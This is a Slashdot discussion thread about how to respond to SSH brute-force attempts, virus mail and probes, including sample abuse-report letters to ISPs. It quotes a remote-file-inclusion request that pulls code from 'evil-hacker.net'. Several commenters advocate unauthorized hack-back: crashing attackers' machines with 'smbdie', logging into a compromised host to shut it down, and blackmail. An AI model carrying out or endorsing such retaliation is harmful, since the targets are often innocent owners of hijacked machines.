    I tend to send emails such as this.

    "
    Hi there.

    I've got several viruses from your customers today, and would appreciate it if you could notify your customers about the virus infections they probably have.

    Here are the relevant snippets from my logs:

    Virus: Netsky.B
    Received: from at

    Virus: Bagle.C
    Received: from at

    All timestamps on the server are NTP-sync'ed against .

    Thanks for your time
    "

    Recently I've also included a more personalized

    "Oh, and I have to commend your ISPs efficiency, as since march - you've managed to reduce the number of virus sending users to us from about per day, to this .. it's days since the last virus from you! Keep up the good work!"

    You could probably just adapt what I'm writing to something saying that a customer of theirs probably has been cracked, and that they are currently scanning for .. and so forth.

    If it's the actual cracker that's stupid enough to use his own computer, he'll get scared enough if they contact him telling him that his computers has been abused by others to scan people -- and will probably quit doing it. :)

    --
    "Rune Kristian Viken" - http://www.nwo.no - arca
    1. Re:Yes, there are several good ways. by JWSmythe · · Score: 3, Interesting


      Damn, you must have a lot of time on your hands..

      We actively block viruses at the mail server, and our logs show over 20k came towards us yesterday. Want to parse my logs and report the infected machines? :)

      And yes, we don't send the automagic "We received a virus" notices. Those are just plain annoying considering most headers are faked.

      --
      Serious? Seriousness is well above my pay grade.
    2. Re:Yes, there are several good ways. by arcade · · Score: 2, Informative

      Damn, you must have a lot of time on your hands..

      Nah. We only get around 50 viruses per day, and I've made a list of the responsive ISPs. I tend to email the responsive ISP's one email per day, containing nothing but the relevant headers.

      The ISPs just receives an email with the name of the virus, and the Received: from header(s) they need to track down the person with that virus.

      Most is automatically generated by my scripts. I just paste it into my mail client and send it off with a few nice words on top of the list - and if I'm very pleased with the ISPs responsiveness in the past -- some nice words of encouragement for their great work.

      The cool thing is that I'm seeing an actual reduction in viruses received from the responsive ISPs, and when they're bogged down - I've gotten my "IMPORTANT!" emails moved quickly up the queue. One particular instance with someone that was pounding our mailserver several times per minute - I got a response from the ISP within 20 minutes. :-)) (The same ISP usually responds within one business day, but they moved that particular request up the queue very, very fast :-)

      --
      "Rune Kristian Viken" - http://www.nwo.no - arca
  25. Do what Mr Burns does... by Anonymous Coward · · Score: 5, Funny

    Nothing beats the personal touch of hired goons...

    1. Re:Do what Mr Burns does... by Anonymous Coward · · Score: 0

      What? Release the dogs? or the bees? or the dogs with bees in their mouths that when they bark they shoot bees at you?

    2. Re:Do what Mr Burns does... by Anonymous Coward · · Score: 0

      Nothing beats the personal touch of hired goons...

      Hired goons?

  26. at some level you have to ignore it.... by cbdavis · · Score: 5, Informative

    or you'll spend half your time at work writing abuse letters. My logs at work show a constant barrage of windows attacks ( yes, code red is still there), 137 scans, numerous login hacks for any number of OS's, port scans that increment by 1 each time, etc. Sometimes it slows down. I am beginning to just consider it background noise. Just the cost of doing business on the web. As long as the probes arent massive or working, I just note and ignore. I only have so much time for this - it keeps me from downloading all that porn!

  27. Ignore it? by Inominate · · Score: 4, Informative

    This kind of stuff is all over the place. Odds are most of these are automated worms and similar crap. Unless it's really a concerted attack on your machines, as opposed to random scanning, it's not worth the effort to do anything about it except maybe firewall the IP.

    1. Re:Ignore it? by Uzik2 · · Score: 1

      When most of these virii came out my system
      started getting lots of intrusion attempts.
      I setup a shell script to grep them out of the
      log, then it would use the same vulnerability
      that allowed the virus to enter that system
      to popup a window on the machine letting the
      owner know he'd been infected. I have no idea
      if it actually resulted in anyone fixing their
      problems but it made me feel better.

      --
      -- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
  28. Why not seem like a cease and desist gnome? by astrashe · · Score: 2, Insightful

    I don't understand why you'd care how you come off to the people trying to crack into your system.

    They're out to do you harm. If one of them gets through and does some damage, you could lose your job.

    1. Re:Why not seem like a cease and desist gnome? by allanj · · Score: 1

      Maybe because the people he CAN contact are working for the ISP of the offending party, and they are usually not to blame? No reason to piss off some guy working for an ISP, especially if you'd like that guy to help you with similar requests in the future.

      --
      Black holes are where God divided by zero
    2. Re:Why not seem like a cease and desist gnome? by valdezjuan · · Score: 2, Informative

      In some (these days it may even be most) cases the machine that is doing the attacking has been compromised and hijacked by the cracker. So the 'owner' of that machine may not know that there machine is contributing to global chaos that is the internet. So you might not want to send them a note blasting them (though they are or were running a machine that wasn't patched, whatever). Sometimes machines slip through the cracks and sites with really good security policies and dedicated security people get 0wned, so being polite is generally a good policy. How would you like to get a note that insults berates, humiliates you, instead of someone saying that your machine appears to have been attacking thier machine and could you look into it. This way the person is grateful for you pointing out that there machine was compromised and is more likely to let you know what happened. At least this has been my experience.

  29. abuse@.... by keithdowsett · · Score: 2, Insightful

    Hi,

    As several posters have already stated you should complain to the abuse address for their ISP. Ideally, you should include logs of the attempt.

    You should also be aware that that the machines which are attempting to connect to your network are probably zombies. There are a number of trojans and security holes which can be exploited to allow a remote user to take over a poorly secured system. The owners probably don't even realise that their machines have been compromised.

    I'm not sure there's much an ISP can do other than try to find out which customer had been assigned that IP address at the time and write to them. Banning someone for having poor security on their machine is probably a bit harsh, even in these post-9/11 times.

    Keith.

  30. I swear I won't do it again! by teamhasnoi · · Score: 2, Funny

    Just don't tell my mom! She'll take away my Compaq, or make me install SP2!

  31. Secure your machine by Anonymous Coward · · Score: 0

    Welcome the the life on the internet, now its time to make sure your servers are secure. Turn off ALL services that are not required. Configure SSH do disallow root logins and passwords. From now on the only way into the servers should be by using SSH cryptokeys.

  32. replace with secure systems - fast! by Anonymous Coward · · Score: 0

    I had an intrusion once - no wonder, really. The machine had an old SuSE install with all ports open, all services running: lpd, samba, X11, etc...

    I didn't care much about it, it was just a small box and so I just sat back and watched the anomalous activity for about two weeks. But when the intruder installed a rootkit, I got nervous. Immediately removed the thing from the net and tried to figure out if they got access to the DB servers. Next day, the box was replaced by a hardened debian stable system, and we kept sure that only necessary stuff was on it and all the security patches installed.

    We reported the incident to the police, but what can they really do? There were IPS from Bulgaria, Brazil and S. Korea exploiting the sshd at the same time....

    We really learned our lesson there, and didn't have an intrusion since (well, except on that other old SuSE box...)

  33. I've been noticing this too by chesapeake · · Score: 1

    FWIW, I'm a student running FC2 on a college LAN in Australia. In addition to the default install, I've whacked on a more complex firewall and also installed portsentry (mainly because IT services believes that running nessus with all of the options checked against the university LAN is a good idea).

    In any case, just recently I've noticed far more attempts to log into SSHd. The number of port scans detected by portsentry is about the same as always - 2 to 5 a day. From yesterday's logwatch, for example, there were attempted logins as admin, guest, root, test and user. According to logwatch they're always tried with no password, then a password.

    eg:

    Illegal users from these:
    admin/none from 203.227.204.32: 2 Time(s)
    admin/password from 203.227.204.32: 2 Time(s)

    I've definitely noticed a major increase in these attempts over the last while. Personally, it doesn't bother me - I just make sure that my passwords are up to date, and that remote root logins are disabled.

    (Edited the snippet above for lameness filter)

    1. Re:I've been noticing this too by FyreFiend · · Score: 1

      Yesterday was the first time in a long long time I've seen someone try to get into my computer. It was the same thing you saw. ssh connections trying to log in as admin, guest, test, and user. Only in my case it was from a host in .cn not .kr. I had thought of dropping an email to the admin of the netblock but it's been my exp that most admins in .cn just don't care.

      --
      - Apple Computer......proudly going out of business for over twenty years.
    2. Re:I've been noticing this too by beakburke · · Score: 1

      noticed the same thing here

      --
      ----- Question authority, but not ours. Hate the man, but we're not him.
  34. And the problem is... by Anonymous Coward · · Score: 2, Funny

    ...the attempted intrusion detection package.

    It's wasting your time.
    It makes you worry.
    It makes you ask silly questions on slashdot.

    The solution is to trash it, you don't need it, Linux is unbreakable anyway.

    1. Re:And the problem is... by Anonymous Coward · · Score: 2, Insightful

      Insightful? HAH! To the moderator I give thee: +1 Funny

  35. get an auto reporting tool by Anonymous Coward · · Score: 2, Informative

    try http://www.mynetwatchman.com/ works like a champ for me.

    the system automatically sends a warning to the isp

  36. Cinderella by AftanGustur · · Score: 1

    Well, after having being doing what you are doing for the last 10 years, I can only say "Welcome to the real world". The level of suspicious activity today is way above the level where you can handle it by complaining to the source ISP. Possibly he has a compromised server on his network, but most likely he doesn't care or doesn't have time to deal with complaints. Why should he anyway.. Scanning and probing isn't illegal in 99% of the world. My advice to you is to secure your network. If you absolutely *have* to allow logins from the outside you should protect the login service by blocking it in the routers *and* use the build-in tcp_wrapers mechanism to control access. Start by blocking *everything* and then open up only those ports you need, and to those that need it. I.e. ports 80 and 25 can be publicly accessible but there is no need for anyone on the outside to send you packets on ports 137-139. Then, run tripwire, take backups and install a IDS. Not because it will tell you of anything in advance, but because they are good for forensics work (After you have been ass-raped by some 16 year old) Abowe all "be paranoid" and don't simply wait until you become a wictim.

    --
    echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
    1. Re:Cinderella by Jonah+Hex · · Score: 1
      ...and don't simply wait until you become a wictim.
      Where do you keep your nuclear wessels? (sorry, had to do it, the "w" isn't even close enough for a mis-type)

      Jonah Hex
  37. Re:Wow! A spike in hack attempts? by MikeDX · · Score: 1

    I think it could be something to do with the Gene therapy! Whats happened is a million of these "super-monkeys" are sitting at a million terminals, all trying to create the works of Shakespeare on port 23....

  38. I had someone trying to brute force ssh.. by dan+dan+the+dna+man · · Score: 4, Insightful
    From a server in Brasil yesterday. I never bother reporting these things normally, but the compromised machine (ie originating the attack) was a webserver and had some "info@" addresses. I wrote, apologising for my lack of Portuguese, and an hour later had a very grateful email from the sysadmin. This is going to encourage me to report them in future.


    Basically I just gave a quick digest of the log clearly showing their IP and the attack in progress, and a note to the effect that I believed their machine had been compromised (in as plain English as I could muster) - and got the desired result.


    I like the fact that there's some script kiddie out there cursing that one of his "boxen" is no longer.. ;)

    --
    I don't read your sig, why do you read mine?
    1. Re:I had someone trying to brute force ssh.. by Jedi+Alec · · Score: 2, Funny

      heh, sysadmins gotta stick together these days. maybe some sort of world-wide affiliation is required, "Sysadmins against kiddies"...hmm, no, that came out kinda wrong

      --

      People replying to my sig annoy me. That's why I change it all the time.
  39. Call their parents by Monkelectric · · Score: 5, Funny

    True story: About 8 years some friends and I were getting o3ned DAILY by a hacker. One of these friends had a buddy in IBM's security division, who somehow got us a name and phone # of our hacker. We felt like asses when we found out we were getting beat down by a 15 years old. But we called his dad, explained what was going on, and that we knew where he lived. Problem SOLVED :)

    --

    Religion is a gateway psychosis. -- Dave Foley

    1. Re:Call their parents by Anonymous Coward · · Score: 0

      We felt like asses when we found out we were getting beat down by a 15 years old.

      In cases like this, you need to figure out when this little brat leaves for school and beat the shit out of him to teach him a lesson. I'm sure thats the last time he'll be trying to hack into anyone's system.

    2. Re:Call their parents by forgotten_my_nick · · Score: 1

      reminds me of something similar happening on www.boards.ie. They had a problem with a script kiddie, he was tracked back to his originating IP. In Ireland the ISP he was on is hard wired to his home phone number, so they got his number and rang him at home. The guy wet himself when they rang him up.

    3. Re:Call their parents by Anonymous Coward · · Score: 0

      Well that is if the hacker is a boy, but if it is a girl, spank work. . .

    4. Re:Call their parents by Anonymous Coward · · Score: 0

      If you were getting owned _daily_, then after at least a couple of days, wouldn't it be better to figure out where your gigantic leak is, and close that instead?

  40. I'm sorry... by schnits0r · · Score: 2, Funny

    I didn't know that I was that big of a problem to your company, I shall stop. Sorry for any inconveinience.

  41. Why is this an abuse? by Anonymous Coward · · Score: 0

    It's like some kids trying some random lock combinations in a locker room.

    This guy wants to take fingerprints, find the kids, and call their mom?

    I say if you want to protect your bath towel with more than 4 numbers, then buy a lock with more than 4 numbers.

    1. Re:Why is this an abuse? by martingunnarsson · · Score: 1

      The ISP I contacted took it pretty seriously, I think. I sent a couple of mails back and forth with the abuse-staff, and got a very good impression from them.

      --
      Martin
    2. Re:Why is this an abuse? by edhall · · Score: 1

      Given that you've probably done more to help their security than your own, they have good reason to follow through.

      This is why the "just ignore it" advice a number of folks are giving is wrong. Even though you might have your network locked down perfectly tight, your attacker is likely to be coming from a compromised host. Thus notifying the owner of that system is going to give them a lot of incentive to improve their security. And that helps improve the whole network "ecosystem" in some small way.

      -Ed
    3. Re:Why is this an abuse? by ArsenneLupin · · Score: 1
      This guy wants to take fingerprints,

      With this locker-room, this is no longer necessary...

    4. Re:Why is this an abuse? by Anonymous Coward · · Score: 0
      I say if you want to protect your bath towel with more than 4 numbers, then buy a lock with more than 4 numbers.

      But who is able to remember a lock combination of 42 digits?

    5. Re:Why is this an abuse? by straybullets · · Score: 1

      Thus notifying the owner of that system is going to give them a lot of incentive to improve their security

      sure, only doing this deserves a salary ...

      --
      With that aggravating beauty, Lulu Walls.
    6. Re:Why is this an abuse? by Lord+Kano · · Score: 1

      I agree with you, but it's all a question of degree. This posting prompted me to check through my logs. There were all kinds of attempts to log into my machine via root/test/guest/admin and they all appeared to be single attempts. I'm not going to take the time to email 50 different admins to tell them that some loser tried a well known exploit on my box. If I was logging a lot of ICMP traffic or numerous attempts from the same IP range to log into my machine, THEN I would report it. Otherwise, it's not worth the time and effort I'd have to put into making it work.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
  42. Maybe related to this? by ComputerizedYoga · · Score: 3, Informative

    mid july or so there were a bunch of random automated-looking and weak looking ssh login attempts all over the place ....

    threads on the full disclosure mailing list archives and dslreports forums about that ....

    wonder if this is what the topic poster was encountering?

  43. What intruders? by Anonymous Coward · · Score: 0
    VERY IMPORTANT QUESTION

    How are they intruders if they failed to login as root?


    God, mod me down if you think im just being a troll... but seriously mod this up if you think this guy asking the question is a total dumbass.

    If you don't want incoming connections, block them through whatever means you feel necessary... from a firewall to actually unplugging the network connection. You will never stop attempts while you are connected to the Internet... there are 2^32 ip addresses... granted only a portion are in use and Internet routed, you still have way too many millions of emails to send ISPs every year...

    Actual intrusions can be handled differently... but random connections and login attempts mean absolutely nothing.
  44. IRC Shows all sorts of fun stuff by HFShadow · · Score: 1

    I run an irc network for work and I've seen many fun things. Most of the time I'll just place a ban and let it slide. I've seen mail + web servers try to attack the network however and that'll justify an email to some poor sysadmin.

    The most unusual was a machine with a google.com reverse dns. I emailed google and they said it was impossible to be them and told me to go away basically =/

    1. Re:IRC Shows all sorts of fun stuff by Yottabyte84 · · Score: 1

      RDNS isn't to be trusted if the attacker is in control of the Reverse DNS of his IP

  45. don't forget logfiles & date/time by Errtu76 · · Score: 3, Informative

    Be sure though to include *all* relevant log files too. I've sent a couple of mails in the past to ISPs and i think i got a response from about 50% of the ISPs contacted, from which only one responded once by saying they contacted the individual and took appropriate actions ... whatever that may mean.

    You'd be better off configuring your security better though.

  46. My basic template to ISPs by BrynM · · Score: 4, Interesting
    Please note that this is innefectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN and who has registered domain names at a lot of different places. Think hard before you send unless you write something automated - You may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

    Due to abuse, the following IP address(s) have been banned from accessing
    mydomain.com and it's associated services. The abuse is detailed as
    follows:

    IP(s) Banned: 216.nnn.225.nn

    Owner:
    OrgName: SOME ISP
    Address: 2 Hacker Home Street
    City: Isabel
    StateProv: CA
    PostalCode: 01120
    Country: US
    Admin Address: noc@someisp.net

    Reason:
    Malformed URL - Attempted PHP Exploit
    "216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET
    /themes/default/theme.php?THEME_DIR=http://w ww.evil-hacker.
    net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352"

    Severity: 5

    Remaining bans until entire address block banned: 3

    If you have any questions or need further explanation, please contact
    admin@mydomain.com.

    You
    Your Title
    Your Contact Info
    --
    US Democracy:The best person for the job (among These pre-selected choices...)
  47. Just my (short) experience. A suggestion. by pasko · · Score: 2, Interesting

    Last week I managed to login as root into a machine (from a chinese domain, as usual) for which I had packets logged in my firewall's log. Then, I installed in that machine chkrootkit: lots of executables were wrong (rootkits). Then, someone logged in remotely and left in /root a "readme.txt" message warning me not to log in other's computers .... Finally I did three things: 1.- Send an e-mail to the contact-addresses retrieved from APNIC 2.- Copied my shutdown executable to that machine (the original was obviosly tricked) 3.- Remotely, executed @> shutdown -h now Just a suggestion.

  48. Re:What intruders? - Good point! by Anonymous Coward · · Score: 1

    Seriously, reading through most of the comments on this story has the odor of child script kiddiez... saying "email abuse@isp.com" or "hack them back" or "run nmap and then hax0r them" or "call their parents"....

    whatever. Just ignore the shit, because it isn't a problem if there is no intrusion.

  49. corporate cease-and-desist gnome by evil_one666 · · Score: 1

    I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"
    Despite the fact that you work for a small company, you will in fact be a corporate cease-and-desist gnome if you send out such a letter. That is unfortunately the price you pay.
  50. Firewall? by vandan · · Score: 2, Interesting

    Complaining to people won't get you anywhere, unless you go to the government and claim that you believe they are terrorists. That will get you some action.

    My advise is to firewall them.

    Personally I also try giving them a taste of their own medicine. You'd be surprised how many Windows machines are still vulnerable to the old 'smbdie'. I set up a cron job to 'smbdie' all hackers / spammers etc every 5 minutes. But of course this is horrible advise because ( and I'm sure everyone will respond and tell you that it's very naughty to fight fire with fire, and you will most likely go blind or some bullshit. )

    So yeah. Firewall them. And if you've got time, email their ISP and tell them that you've firewalled them and if you have any complaints from customers about them not being able to access your sever, that you will advise them that their ISP is harbouring hackers and that they should switch ISPs.

    1. Re:Firewall? by oo_waratah · · Score: 1

      The issue with this is that no attempt has been made to let the other party know that they are at risk. It is highly likely that it is a computer that has been comprimised itself.

      Let the other party know via an email, at least an attempt to the ISP in question. It may not come to anything but at least you have communicated and potentially corrected another internet loophole.

    2. Re:Firewall? by vandan · · Score: 5, Informative

      Yeah I know the gentleman's approach.

      I don't subscribe to it. I look at it like this:

      To drive a car, you need a licence. You have to follow rules. You drive on the correct side of the road. You don't drink and drive. You obey the speed limit. And why do we have to follow the fules? It's because there are other people who also want to use the road, and therefore all drivers have a responsibility to ensure that the safety of others is protected.

      Sounds like common sense, right? Well the same should apply to placing computers on the internet. If you want to have viruses and backdoors and worms etc running on your home PC, then fine. Whatever. But if you put your home PC on the internet and take absolutely no fucking responsibility for what you are doing then you are waiving all rights you have over the the safety of your computer. If your computer now pisses me off, I'll 'smbdie' it off the internet. If you're fine with all the rest of the shit that's infecting your PC, then you don't really have any right to complain about me rebooting it once every 5 minutes. And yes I'm doing everyone a service. Firstly, the computer is on the internet for less time than it otherwise would have been, so there's less chance of others being infected. Also, the idiot who owns the computer will be far more likely to do a complete re-install, or at least get a god-damned virus checker and get Windows up-to-date.

      Do you know how many people come bitching and complaining to me about their PC being rooted, and when I boot it up find that they're running Windows 2000 SP1 and NO virus protection at all? It's not good enough. And the only ways to get them to take responsibility for their computer are:

      a) Legislate. No-one wants legislation covering their computer. It will screw things up for the responsible among us and have no effect on the rest.

      b) Make it so unconfortable to run an unprotected computer that they get the hint and protect it.

      Having said all this, I know most people will still disagree with me. That's fine. Be angels. Just keep your damned computer secure and you've got nothing to worry about.

    3. Re:Firewall? by Etherael · · Score: 1

      I gotta agree, I wonder sometimes if the white knight worms have the wrong approach, and once a worm is released into the wild that results in legions of zombies, another worm ought to be written to outright annihilate the hordes, as in format /q /y c: rm -rf / *DIE* mf.

      At least this way the threat of digital death would make people update their systems.

    4. Re:Firewall? by sdssds · · Score: 1

      >> If your computer now pisses me off, I'll 'smbdie' it off the internet. can I send you the list of IPs which tried to break into my system lately?

    5. Re:Firewall? by oo_waratah · · Score: 1

      When someone does something stupid you blow your horn. When enough people have blown their horn at a driver they learn how to drive better.

      How is silence better? The chaos of stupid people not 'knowing the rules' and driving on the wrong side of the road because no-one cares to tell them different.

      The system is not perfect, however we have to attempt to make the web a better place for all.

      I have found the way out of unpaid PC support. I have not run windows for 2 years, sorry I cannot help you.

    6. Re:Firewall? by Anonymous Coward · · Score: 1, Insightful

      Your analogy breaks down.

      Are the rules of the road completely different if you're driving a Honda or a Ford? Are people daily finding ways to remotely take over your car and ram it into things?

      People should not have to know every goddamn thing about their cars before they drive them - you do not need to be a mechanic to drive a car.

      Hell, when I go to the mechanic, my eyes glaze over when he starts rambling on about what exactly went wrong. I don't give a fuck what went wrong, and I wouldn't know a carburator from a flux capacitor, how about fixing it and, if there's something I can do to avoid the problem in the future, lemme know.

      Same goes for computing.

      Yeah, it'd be great if people would lock down their boxes but the problem is not that people won't take responsibility, but that they are not educated about what to do to fix a problem.

      I'm not a moron, but I tell you I have difficulty parsing what the fuck the latest 50 Windows Updates mean. How the hell is grandma supposed to know what the fuck that stuff means? Windows updates are bad enough, but *nix ones are even worse.

      What needs to happen is that there needs to be a very basically written message: "Click here to keep people from taking over your computer" rather than the jargon laden crap that is there now.

      Simply put, the people who are so up in arms about how people leave their machines vulnerable should solve the problem at the core of it, rather than castigating people for being "stupid" users. Fix the problem rather than bitching at people about it, and then we have something.

    7. Re:Firewall? by Rudeboy777 · · Score: 1

      What needs to happen is that there needs to be a very basically written message: "Click here to keep people from taking over your computer" rather than the jargon laden crap that is there now.

      While I appreciate the idea, this very strategy has been used by the bad guys for some time in order to compromise machines in the form of banner ads with "Click here to speed up your computer!" There are no easy answers to this stuff.

      --

      From hell's heart I fstab at /dev/hdc

    8. Re:Firewall? by Anonymous Coward · · Score: 0

      your acts of causing them to reboot, without their knowledge or permissions, is a criminal act!!

      do you chase down cars that are speeding and shoot their tires out??

      do you stop and beat a person that littered until they cant litter again???

      stop being a part of the damned problem, and follow the fooking rules and proceedures as defined by your local POLICE, or risk making a mistake, piss off someone, and they have YOU arrested and convicted for your criminal acts!

    9. Re:Firewall? by menscher · · Score: 1
      A slightly less evil method I've used when the ISP was unresponsive was to use the Windows Messenger service to pop up a note on their screen telling them to run a virus scanner.

      It usually takes a few days for them to clue in that the notes will continue unless they comply (so it's kinda like blackmail), but it always works. Oh, and I always put my email address in the note so they can email if they have questions. (Makes it seem less like spam that way.)

    10. Re:Firewall? by gcaseye6677 · · Score: 1

      Yea, like some script kiddie is going to report a counterattack to the police. If you fought off a mugging attempt, would you even care if the would-be mugger went to the police? Let some hacker report you for hacking back. That means they have to identify themselves, which means you can prosecute as well. This is a non-issue.

  51. Hack them back! by Numen · · Score: 4, Funny

    Whatever they're doing to you have a go back at them... chances are their system isn't as secure as yours.

    At the very least it's more fun than writting an e-mail!

    1. Re:Hack them back! by Cygnusx12 · · Score: 1

      Actually... whenever I see some pleab scanning my network, I nmap 'em right back. ;)

      My way of saying.. " I seeee you!"

    2. Re:Hack them back! by Anonymous Coward · · Score: 0

      yet another moron that has the mentality of a 10year old...

      hope you get a nice little stay in prison for hacking back, when you could have just informed the proper authorities and had the hacker arrested...

    3. Re:Hack them back! by Java+Ape · · Score: 1
      Mod parent up, and add some informative points to his funny ones. Anybody here ever study military strategy or martial arts? You can't win from a purely defensive posture. (Well, except maybe China, which is so big it simply swallows and assimilates the "conquerers", but that weakens my argument so we'll ignore it).

      Every week hundreds of litte buggers splatter against my firewall. Most are probably zombies, or teenage script kiddies. Some are more serious. Those SCARE me -- I got to help rebuild every machine in the DMZ a while back when some idiot successfuly penetrated our systems. I'm primarily a DBA/programmer so I'm a bit out of my league when faced with the gritty underbelly of network security. If he got the DMZ, how do we know he didn't get further? Crud. What's to stop the same guy from coming back the week after we rebuilt everything?

      Now I may be a security-lightweight, but I work for a very large company. A few cubes over from me lives a man I'll call Guido. Guido eats white papers and craps them out as textbooks. Guido says the intruder didn't make out of the DMZ, I believe him. Guido says he can track the intruder back to ip address he was hacking from, but he can't be sure that it's not a zombie. I believe him. Guido says he added that ip to a database he keeps on troublemakers, and if the same ip shows up more than twice, it's clobbering time. You know what? I believe him! So, if you're the pinhead that cost me several days work, please come back, and use the same host when you do. Guido's waiting, and he's very, very good at what he does!

  52. Contact the ISP... by zxflash · · Score: 1

    The word liability will freak out any small ISP enough to contact the "user" and give them a stern warning... I don't know if you'd have any luck with one of the big boys (AOL, Earthlink...)

    --

    All the torrents you could want.
  53. normal for this time of year by phek · · Score: 5, Funny

    It's really normal to notice a huge increase in attacks this time of year. With the passing of defcon and black hat this month, a lot of new security vunerabilities have been released, and all of the 'script kiddies' are eager to try them out. The best thing to do is make sure all your software is up to date, and get familiar with the new vunerabilities that are out so you can protect yourself.

    As far as reporting them, you could try all day and not be able to report all of them, and even if you did, they're most likely attacking from someone else's vunerable machine. The only thing you can really do is watch out for anyone who's aggressivly attacking you (i.e. one person who's running lots of attacks on you trying desperately to break into your machine at any cost), and report those ones, or if you can find a way to contact that person, tell them to stop before you report them to their isp and/or authorities, this will usually scare most people off.

    Once you do start paying some decent attention to security releases, a lot of these stupid things people try won't surprise you, like the ssh root attempt is because some tool came out recently that just scans netblocks for anyone running ssh and try's logging in as two different users with no password, root being one of them. If your not familiar with where to find security releases, here's some good places to start:

    packetstorm security
    Security Focus

    1. Re:normal for this time of year by jrumney · · Score: 1
      the ssh root attempt is because some tool came out recently that just scans netblocks for anyone running ssh and try's logging in as two different users

      The attempts I've logged have been 4 users. root, admin, user and guest.

    2. Re:normal for this time of year by whovian · · Score: 1

      Add to that the users alias, info, backup, test, test1, test2, test3, support, postgres, contact, dump, oracle, webmaster, master, manager, sysop, msql, security, tmp, temp, ftpuser.

      Interestingly, these are at work, mostly at the end of June and again since the beginning of August. At home I barely got any probes.

      --
      To-do List: Receive telemarketing call during a tornado warning. Check.
  54. Somewhat offtopic, but how do people deal with DOS by bretharder · · Score: 5, Interesting

    Somewhat offtopic, but how do people deal with DOS attacks?
    I've had a person harrasing the forums at a website that I host.
    I banned by IP and then he started using proxys,
    so I had to write a script to ban his IP each time he logged in,
    of course then he started creating new accounts;
    so I had to change the forum registration to one account per unique email address.
    And then he tried to DOS the site by visiting the site and locking down his F5 key.
    (He accually confessed this to me in IRC; he had 4 other people do this with him.)
    I sent Comcast (his isp) the IRC logs & the network monitor logs.
    They sent me a generic response saying "blah blah blah.. this is an automated response".
    And thats it.
    So how do other /.ers deal with situations like this?
    It's a personal website, and I don't have the funds to hire a lawyer.
    I've banned his IP and ~6000 proxy IPs, but he still keeps getting through.

  55. Re:Somewhat offtopic, but how do people deal with by phek · · Score: 1

    well step #1 would be get your site on a server with enough bandwidth so that a few people holding down refresh key isn't going to DOS your site.

  56. Re:Somewhat offtopic, but how do people deal with by bretharder · · Score: 1

    So basically I should give into the f*ckwad and fork over more cash for more bandwidth on a site that -under normal circumstances- doesn't require much bandwidth?

  57. This thread explains your problem ! by Anonymous Coward · · Score: 0

    This thread explains your problem :

    http://www.dslreports.com/forum/remark,10854834~ mo de=flat~days=9999

  58. Read FD by kan0r · · Score: 1

    Hi, this has been reported from several poeple. Read Full Discosure's thread "Automated SSH login attempts" about it. Nothing to worry about i'd say.

  59. Re:This thread explaiins .... corrected link ;) by Anonymous Coward · · Score: 0
  60. May I suggest. by ceeam · · Score: 1

    Figure out those kids for sure (should be not hard, eh?) and then send them letters saying that if they not pay you $20-$50 or smth then you will report them. Yes, blackmail :)

    1. Re:May I suggest. by andrewweb · · Score: 1

      How do you get an email address from an IP, other than an abuse@xxx one?

  61. Be carefull. by Anonymous Coward · · Score: 0

    Try "ping -s 638 " If they are watching their traffic they will hopefully get the message.

    If they aren't watching something like iptables mirror feature might be ammusing. Be carefull with this because if they fake their source address you will counter attack somebody who shouldn't be involved. Keep your logs if you do this just in case.

    I mostly just ignore these attacks now. A couple of years back I reported a couple of kids for this sort of thing. Their ISP's responce was very favourable. Unfortunately about 4 days later the network that I was running was choked by incomming smurf traffic. I couldn't prove anything this time because it was all just response to a faked source. I managed to get the smurf relays to filter their networks but it still hurt for a while.

  62. The answer is obvious by Anonymous Coward · · Score: 0

    Bust a cap in their ass and call it a day, homes.

  63. Keep up to date, if bored, email abuse@isp.example by feargal · · Score: 1

    Well, I've seen this recently, there appears to be some script going about trying various password for root, admin nobody, guest, and other common accounts. I've noticed this happening to machines in 3 independent networks I look after.

    Most important thing is to make sure you're software is up to date - there's no point spending time crafting letters when you should be updating.

    Only if you have time, should you bother complaining to anybody.

    Here's the template email I use:

    Hi,
    We intercepted a series on unauthorised login attempts to one of our hosts last night. This originated from one of the machines on your network, [IP ADDRESS], and started at [TIME DATE TZ].
    We have seen similar attempts at other times originating from other hosts, so there is probably either an open proxy on this particular host, or it has itself been compromised and is being used as a zombie.

    Either way, I thought you'd like a heads-up, it should be checked out. Full logs are listed below.

    Thanks for your time,


    I reckon I've had 50% success on the first attempt with this. Many of the people out there just couldn't be arsed in the first place, so I'm not going to waste my time complaining to them - or not until I've nobody else to complain to first.

    --
    "A goldfish was his muse, eternally amused"
  64. Complaining may have a boomerang effect by hankwang · · Score: 5, Insightful
    Let me tell you a true story.

    Back in January 1999 when everybody used telnet for remote logins, several computers in our department were root-compromised and had a rootkit installed (password sniffer, backdoors, and patched versions of ps, ls, and such to prevent being detected). We noticed some strange activities but had no clue what was going on, thinking that other people were trying to intrude us, while actually the cracker used our computers to intrude other people. It felt a bit like being in a thriller, where we step by step discovered what was going on, culminating in a session where we witnessed live how the cracker was logged in on one computer, from which he tried logging in on a second computer where we already had changed all passwords. We contacted the internet provider (he was behind an IP-masquerading firewall) and an university where he apparently illegally had plugged in a computer on the network and of course the cracker had been reading a number of emails before we finally locked down our systems.

    Since then, our computers got enormous attention from crackers, while suspicious messages appeared much more seldomly in other people's log files. This cracker was severely pissed off. We were compromised several times after that. Once, the presence of a rootkit revealed itself through the fact that an ls option wasn't working anymore. We repaired the situation and removed telnet/ftp from the computer (they had suspicious log file mesages), not knowing that it was the outdated sshd that caused the trouble. After the weekend, the owner of the computer came to me complaining that he couldn't log in. It turned out that the intruder wiped his whole home directory, which had no recent back-up! I can not believe that a cracker does something like that for any other reason than pure revenge.

    These incidents have taught me the value of staying up-to-date. What I wanted to tell here is: don't let the cracker know that it was you who caused them trouble or you might get repercussions. Oh, and note that I am not a professional system administrator; I was a PhD student who happened to know a bit more about Linux than most others.

    1. Re:Complaining may have a boomerang effect by PhilHibbs · · Score: 1

      That sounds a little like paying off kidnappers. Treating all black-hats as a single entity, you are rewarding them for their past mis-deeds, and encouraging them to backlash again in future.

    2. Re:Complaining may have a boomerang effect by abb3w · · Score: 1
